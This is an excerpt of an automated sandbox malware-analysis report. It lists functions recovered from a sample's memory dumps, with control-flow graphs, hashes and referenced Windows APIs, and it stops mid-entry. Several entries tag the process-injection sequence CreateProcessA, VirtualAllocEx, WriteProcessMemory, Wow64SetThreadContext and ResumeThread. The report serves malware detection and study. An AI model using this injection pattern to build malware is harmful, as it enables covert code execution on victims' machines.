434->395
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .@rl$Q($0$Z^9
                                  • API String ID: 0-2953857927
                                  • Opcode ID: f685cf1ad604db127af6e2b442835dfd45b20b0a521395838eb7c70e3f161549
                                  • Instruction ID: 78ebabf7054fcd6155bca284c57f5989fd27a195251317f796502f1d9d14910e
                                  • Opcode Fuzzy Hash: f685cf1ad604db127af6e2b442835dfd45b20b0a521395838eb7c70e3f161549
                                  • Instruction Fuzzy Hash: 1F33C1B4E052288FDB64DF24CD81BEDB7B2AB89304F5082E9951DA7390DB356E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A2CC1 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 589 1a2cc1-1a2ce5 590 1a2cf2-1a2d2a 589->590 591 1a2ce7-1a2cea 589->591 593 1a2f3c-1a2f87 590->593 594 1a2d30-1a2d39 590->594 591->590 622 1a2f89 593->622 623 1a2f9d-1a2fbc 593->623 595 1a2d3f-1a2d4b 594->595 596 1a2df1-1a2df8 594->596 595->593 600 1a2d51-1a2d5a 595->600 598 1a2e2a-1a2e39 596->598 599 1a2dfa-1a2e0c 596->599 602 1a2e3b-1a2e4a 598->602 603 1a2e64-1a2e70 598->603 599->593 601 1a2e12-1a2e28 599->601 604 1a2d5c-1a2d77 600->604 605 1a2dc7-1a2dd6 600->605 606 1a2e73-1a2e7f 601->606 615 1a2e53-1a2e61 602->615 603->606 604->605 614 1a2d79-1a2d7f 604->614 605->593 607 1a2ddc-1a2deb 605->607 606->593 609 1a2e85-1a2e9d 606->609 607->595 607->596 609->593 612 1a2ea3-1a2ed8 609->612 612->593 621 1a2eda-1a2eeb 612->621 616 1a2d8b-1a2d97 614->616 617 1a2d81 614->617 615->603 616->593 618 1a2d9d-1a2dc4 616->618 617->616 625 1a2eed-1a2efa 621->625 626 1a2f32-1a2f39 621->626 627 1a2f8c-1a2f8e 622->627 625->626 634 1a2efc-1a2f29 625->634 629 1a2fbd-1a2fff 627->629 630 1a2f90-1a2f9b 627->630 641 1a301b-1a3043 629->641 642 1a3001-1a3004 629->642 630->623 630->627 634->626 646 1a3085-1a308b 641->646 647 1a3045-1a304b 641->647 643 1a3007-1a3019 642->643 643->641 643->643 649 1a308d-1a3090 646->649 650 1a30d1-1a30eb 646->650 647->646 648 1a304d-1a3050 647->648 651 1a30ee-1a311d 648->651 652 1a3056-1a3060 648->652 649->651 653 1a3092-1a309c 649->653 665 1a311f 651->665 666 1a3124-1a3126 651->666 655 1a307f-1a3083 652->655 656 1a3062-1a307b 652->656 657 1a30cb-1a30cf 653->657 658 1a309e-1a30b4 653->658 655->646 655->648 656->655 657->649 657->650 658->651 660 1a30b6-1a30c7 658->660 660->657 665->666 668 1a3128 call 1a54b7 666->668 669 1a3128 call 1a5fe5 666->669 667 1a312e-1a3136 668->667 669->667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .@rl$.@rl$d
                                  • API String ID: 0-497906446
                                  • Opcode ID: d777adf2e0eaa138e803f5e0267ba427c435e8322c70f4e68ec2f90f07610873
                                  • Instruction ID: 1cf99e7308c49f824cdcaa96f16bbb9535fb38aaa82ea4f5e7ccccda87a6fd4f
                                  • Opcode Fuzzy Hash: d777adf2e0eaa138e803f5e0267ba427c435e8322c70f4e68ec2f90f07610873
                                  • Instruction Fuzzy Hash: 20E15A78A002198FCB15CF58C9C09AAFBB6FF89314B15C665E815AB296C734EC41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0478 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 670 1a0478-1a0484 671 1a0500-1a0506 670->671 672 1a0486 670->672 674 1a0512-1a051b 671->674 673 1a0488-1a04a3 672->673 675 1a04aa 673->675 678 1a0522-1a054d 674->678 677 1a04b4-1a04b6 675->677 679 1a04bd-1a04db 677->679 684 1a0557-1a0559 678->684 683 1a04e2-1a04f8 call 1a0643 679->683 687 1a04fe 683->687 686 1a0560-1a05da 684->686 696 1a05e4-1a0602 686->696 687->671 698 1a060c-1a0625 696->698 700 1a0630 698->700 701 1a0627 698->701 702 1a0631 700->702 701->700 702->702
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fCrl$fCrl
                                  • API String ID: 0-1803420456
                                  • Opcode ID: b7c0c5b24357ca1aac69d544d497590b4b33600cc8c8788e8c8e7fbc48201166
                                  • Instruction ID: db6c1d3c9600ed230793e87aa5138c0e55f251a57a90b31428012a10cc55cce1
                                  • Opcode Fuzzy Hash: b7c0c5b24357ca1aac69d544d497590b4b33600cc8c8788e8c8e7fbc48201166
                                  • Instruction Fuzzy Hash: BB41D0347101048FD708EB74DA59B6E37E3ABC9304F25446CE502AB3E9CFB99C468B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0064 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 704 1a0064-1a0602 call 1a0643 732 1a060c-1a0625 704->732 734 1a0630 732->734 735 1a0627 732->735 736 1a0631 734->736 735->734 736->736
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fCrl$fCrl
                                  • API String ID: 0-1803420456
                                  • Opcode ID: ed6df8e7cba6cafd82ca2f5afb1e28da6c63090f0b4286a7c2007d2375e3b4c9
                                  • Instruction ID: 2619ab1d8a8408ad14afbdb248447fce28662d81434c55e177bf8fd7f7fd70e9
                                  • Opcode Fuzzy Hash: ed6df8e7cba6cafd82ca2f5afb1e28da6c63090f0b4286a7c2007d2375e3b4c9
                                  • Instruction Fuzzy Hash: 8241B2347141048FD708AB74DA59B6E36E3ABC9304F25442CE506AB3E9CFB5DD468B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797518 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 738 797518-7975b1 740 7975fa-797622 738->740 741 7975b3-7975ca 738->741 745 797668-7976be 740->745 746 797624-797638 740->746 741->740 744 7975cc-7975d1 741->744 747 7975d3-7975dd 744->747 748 7975f4-7975f7 744->748 755 7976c0-7976d4 745->755 756 797704-7977f2 CreateProcessA 745->756 746->745 753 79763a-79763f 746->753 750 7975df 747->750 751 7975e1-7975f0 747->751 748->740 750->751 751->751 754 7975f2 751->754 757 797641-79764b 753->757 758 797662-797665 753->758 754->748 755->756 764 7976d6-7976db 755->764 774 7977fb-7978e0 756->774 775 7977f4-7977fa 756->775 759 79764d 757->759 760 79764f-79765e 757->760 758->745 759->760 760->760 763 797660 760->763 763->758 766 7976dd-7976e7 764->766 767 7976fe-797701 764->767 768 7976e9 766->768 769 7976eb-7976fa 766->769 767->756 768->769 769->769 770 7976fc 769->770 770->767 787 7978f0-7978f4 774->787 788 7978e2-7978e6 774->788 775->774 790 797904-797908 787->790 791 7978f6-7978fa 787->791 788->787 789 7978e8 788->789 789->787 793 797918-79791c 790->793 794 79790a-79790e 790->794 791->790 792 7978fc 791->792 792->790 796 79791e-797947 793->796 797 797952-79795d 793->797 794->793 795 797910 794->795 795->793 796->797 800 79795e 797->800 800->800
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007977DF
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 5948c3204b5d6d891ee816a855f5bb06baf99bd31d3c1daa987f93ad57735890
                                  • Instruction ID: c2b11ba09b66c2cde246f1ed2ef4e490d74f2500e77ae96f612ffcbbb1f0d214
                                  • Opcode Fuzzy Hash: 5948c3204b5d6d891ee816a855f5bb06baf99bd31d3c1daa987f93ad57735890
                                  • Instruction Fuzzy Hash: D9C14670D182298FDF24CFA8D841BEDBBB1BF49304F0095A9D949B7240EB749A85CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797BFA Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 802 797bfa-797c6b 804 797c6d-797c7f 802->804 805 797c82-797ce3 WriteProcessMemory 802->805 804->805 807 797cec-797d3e 805->807 808 797ce5-797ceb 805->808 808->807
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00797CD3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: eac6662cd0f675257da5dec244a4355981dd98abaa1185a4274a60d4748ac559
                                  • Instruction ID: 44b2c0713aec3bcb1e9664160e30d237daf52a33aaeb732ad7ee83cddddfe38a
                                  • Opcode Fuzzy Hash: eac6662cd0f675257da5dec244a4355981dd98abaa1185a4274a60d4748ac559
                                  • Instruction Fuzzy Hash: E541ABB5D052489FCF00CFA9E984AEEBBF1BF49304F14942AE814B7250D738AA45CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797C00 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 813 797c00-797c6b 815 797c6d-797c7f 813->815 816 797c82-797ce3 WriteProcessMemory 813->816 815->816 818 797cec-797d3e 816->818 819 797ce5-797ceb 816->819 819->818
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00797CD3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 9594f41d949a4c9696f68743b16c1ed3611cef305851dc53fafd15a2c6a7b6f3
                                  • Instruction ID: c410477578cb7da257063ad7ecc65db2c7097029325121f1db8e842a0cc84f6a
                                  • Opcode Fuzzy Hash: 9594f41d949a4c9696f68743b16c1ed3611cef305851dc53fafd15a2c6a7b6f3
                                  • Instruction Fuzzy Hash: 3A41BAB5D052489FCF00CFA9D984ADEFBF1BF49314F10942AE814B7240D738AA45CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797E50 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 824 797e50-797f12 VirtualAllocEx 827 797f1b-797f65 824->827 828 797f14-797f1a 824->828 828->827
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00797F02
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 7f807e5c2f7690b34a6b0f77d0881e44c415c6fd2be7032fcbe7369447e4ded1
                                  • Instruction ID: a9abd6a549c3b6d5c8846563a450a6e08973c7cbfeac800fcaf3c4c1ec9c706d
                                  • Opcode Fuzzy Hash: 7f807e5c2f7690b34a6b0f77d0881e44c415c6fd2be7032fcbe7369447e4ded1
                                  • Instruction Fuzzy Hash: 0041A8B9D042489FCF00CFA9E980AEEBBB1BB49314F10942AE815B7210D735A946CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797E58 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 833 797e58-797f12 VirtualAllocEx 836 797f1b-797f65 833->836 837 797f14-797f1a 833->837 837->836
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00797F02
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 07d4ee17eed6c25276f6959a77d2f474024706bec5df64513adcf082f8dc7872
                                  • Instruction ID: 549a131b211a3620ba1d3482acb642d076d6eae141f924c82ab45a5736758ed7
                                  • Opcode Fuzzy Hash: 07d4ee17eed6c25276f6959a77d2f474024706bec5df64513adcf082f8dc7872
                                  • Instruction Fuzzy Hash: D63187B9D042589FCF10CFA9E984AAEFBB1BB49314F10A42AE914B7310D735A945CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007979A0 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 842 7979a0-797a08 844 797a0a-797a1c 842->844 845 797a1f-797a67 Wow64SetThreadContext 842->845 844->845 847 797a69-797a6f 845->847 848 797a70-797abc 845->848 847->848
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00797A57
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 81f281a605a7860afd4cd840bc6023864b64d0ee024c0dff23d434f31c901741
                                  • Instruction ID: 251f94c79d716337f663d1106eb2c0ba9ed4e02eb2eda94cf21c94fc524ed3d8
                                  • Opcode Fuzzy Hash: 81f281a605a7860afd4cd840bc6023864b64d0ee024c0dff23d434f31c901741
                                  • Instruction Fuzzy Hash: 1A41DBB4D152489FDF04CFA9E884AEEBBF0BF49314F24842AE404B7240D738AA85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007979A8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 853 7979a8-797a08 855 797a0a-797a1c 853->855 856 797a1f-797a67 Wow64SetThreadContext 853->856 855->856 858 797a69-797a6f 856->858 859 797a70-797abc 856->859 858->859
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00797A57
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1a9343e957d08cbac0464317b83141f808fba8fe8e5416c7b26610188973c60b
                                  • Instruction ID: bd15feffb1030e75434c80d0ef4c0a840959344e82f99057d72dd45de14f00ec
                                  • Opcode Fuzzy Hash: 1a9343e957d08cbac0464317b83141f808fba8fe8e5416c7b26610188973c60b
                                  • Instruction Fuzzy Hash: 7D31CBB4D152589FDF04CFA9E984AEEBBB0AB49314F14842AE414B7240D738AA85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797F71 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 864 797f71-798006 ResumeThread 867 798008-79800e 864->867 868 79800f-798051 864->868 867->868
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: b6a765a88c3ef6dce4e852ebecbd51a0e2a7cf033a46b68303100ce55cffa7bc
                                  • Instruction ID: 8effb8f93bf2407ff4117bfb2a43a1bc8d9e2ee94009a5f5a766f7ce47f92b68
                                  • Opcode Fuzzy Hash: b6a765a88c3ef6dce4e852ebecbd51a0e2a7cf033a46b68303100ce55cffa7bc
                                  • Instruction Fuzzy Hash: 5B31D8B4D052089FCF10CFA9E984AAEFBB0AF49314F20942AE814B7340CB39A945CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00797F78 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 873 797f78-798006 ResumeThread 876 798008-79800e 873->876 877 79800f-798051 873->877 876->877
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: d28f536ae3908b40c5a4ddc3df0390436d03237efeacef4f90a8679337a0a9b0
                                  • Instruction ID: ce79962be4efbc3facc93d07bc263a3a2c3e15b89fc114a6e13fc9574490be63
                                  • Opcode Fuzzy Hash: d28f536ae3908b40c5a4ddc3df0390436d03237efeacef4f90a8679337a0a9b0
                                  • Instruction Fuzzy Hash: F531C8B4D052089FCF10CFA9E984A9EFBB4BF49314F10942AE814B7340DB39A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A2FD8 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 882 1a2fd8-1a2fff 884 1a301b-1a3043 882->884 885 1a3001-1a3004 882->885 889 1a3085-1a308b 884->889 890 1a3045-1a304b 884->890 886 1a3007-1a3019 885->886 886->884 886->886 892 1a308d-1a3090 889->892 893 1a30d1-1a30eb 889->893 890->889 891 1a304d-1a3050 890->891 894 1a30ee-1a311d 891->894 895 1a3056-1a3060 891->895 892->894 896 1a3092-1a309c 892->896 908 1a311f 894->908 909 1a3124-1a3126 894->909 898 1a307f-1a3083 895->898 899 1a3062-1a307b 895->899 900 1a30cb-1a30cf 896->900 901 1a309e-1a30b4 896->901 898->889 898->891 899->898 900->892 900->893 901->894 903 1a30b6-1a30c7 901->903 903->900 908->909 911 1a3128 call 1a54b7 909->911 912 1a3128 call 1a5fe5 909->912 910 1a312e-1a3136 911->910 912->910
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .@rl
                                  • API String ID: 0-1212071126
                                  • Opcode ID: 7fc22d68ba3a6c409e58e03444c14e08fc22cd77b7960fc8347282887b9bd954
                                  • Instruction ID: 620a749e87029c7257b411904067a0f11e1fb16d8181fda3160adfc7a6159140
                                  • Opcode Fuzzy Hash: 7fc22d68ba3a6c409e58e03444c14e08fc22cd77b7960fc8347282887b9bd954
                                  • Instruction Fuzzy Hash: 48419078A0070A9FC714CF64C585A6AFBF5FB86314F10C66AE52587691D730E985CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001AEDE0 Relevance: .7, Instructions: 691COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a32871cbc98fa7766509804c4b773ece157da84956e9c1c1302eb61ef7fc7b05
                                  • Instruction ID: 6966ace77ca9fadb77f8c4d2e8c8441f865626a81884deec1c90a1299a276811
                                  • Opcode Fuzzy Hash: a32871cbc98fa7766509804c4b773ece157da84956e9c1c1302eb61ef7fc7b05
                                  • Instruction Fuzzy Hash: FFD18D39E00219DFCB04DFA4D9409ADFBB2FF86314F158269D825AB7A5DB30AD45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001AF800 Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 455e986da84de5b1a4eca7cae6fccc16f7c2820e9a02531fec4e4f5dc1335a61
                                  • Instruction ID: 9fbc0cd07d22841fb200e4af43dd784f94eb7a82c10c63b6b7a7fb4471976878
                                  • Opcode Fuzzy Hash: 455e986da84de5b1a4eca7cae6fccc16f7c2820e9a02531fec4e4f5dc1335a61
                                  • Instruction Fuzzy Hash: D661E178E01218DFDB18DFA5D944AAEBBB2BF4A304F208429E415BB390DB349946CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0DD8 Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 403282d032ae88ce5ebdc6e8008748f95f4776772b158656a4aad82716ee9c2f
                                  • Instruction ID: c9a86f97768a0c69f0cfdf556d38109ce45af97f0edaf8ec93bdb975ae445843
                                  • Opcode Fuzzy Hash: 403282d032ae88ce5ebdc6e8008748f95f4776772b158656a4aad82716ee9c2f
                                  • Instruction Fuzzy Hash: 8161C279905265CFDB61EF54C948E8AF7B1BB0A315F4A82D4D509AB222C730DEC5CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A25B2 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed720de9fcace502134632f814c3d557c7ddc8dba04be09cdc427c1737212659
                                  • Instruction ID: 70b51aae5a13e2ddf1b2fd7bf896d01a8722d15d781cad21ae5a2e055b749d6c
                                  • Opcode Fuzzy Hash: ed720de9fcace502134632f814c3d557c7ddc8dba04be09cdc427c1737212659
                                  • Instruction Fuzzy Hash: E351F378905269CFD764EF68C548A8AF7B1BB06315F4AC2D4D859AB212C730DEC1CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0643 Relevance: .1, Instructions: 109COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64e990b238e1597f6e7cb0d63b008f7538d7627d6c34bc79af8de470f1cbe8ba
                                  • Instruction ID: c0ab00ae5ac767c564b0e14fb840db73d526db1c52680e630e7d8d72dec450da
                                  • Opcode Fuzzy Hash: 64e990b238e1597f6e7cb0d63b008f7538d7627d6c34bc79af8de470f1cbe8ba
                                  • Instruction Fuzzy Hash: 63412534E082598FCB05DFA4C8549BEBBB1FF8A304F15849AD045AB3A2DB74AC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A5FE5 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84c42e955a9ece7dda9b2db7a39c7d7b54b3e1fb42cc2908f6a32db6dd461b3e
                                  • Instruction ID: 42b208727f43b720f520858cfb583f7c2c464ff31636222c1024160d060b9cd0
                                  • Opcode Fuzzy Hash: 84c42e955a9ece7dda9b2db7a39c7d7b54b3e1fb42cc2908f6a32db6dd461b3e
                                  • Instruction Fuzzy Hash: FE412878A05128CFD760EF68C944A4DFBB1BB46309F5A82D5E40997252C330EE81CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A29D3 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2cd043107bf8883bf2d08620c5ff65f6f212594fd3d124555e75d3293ea11e54
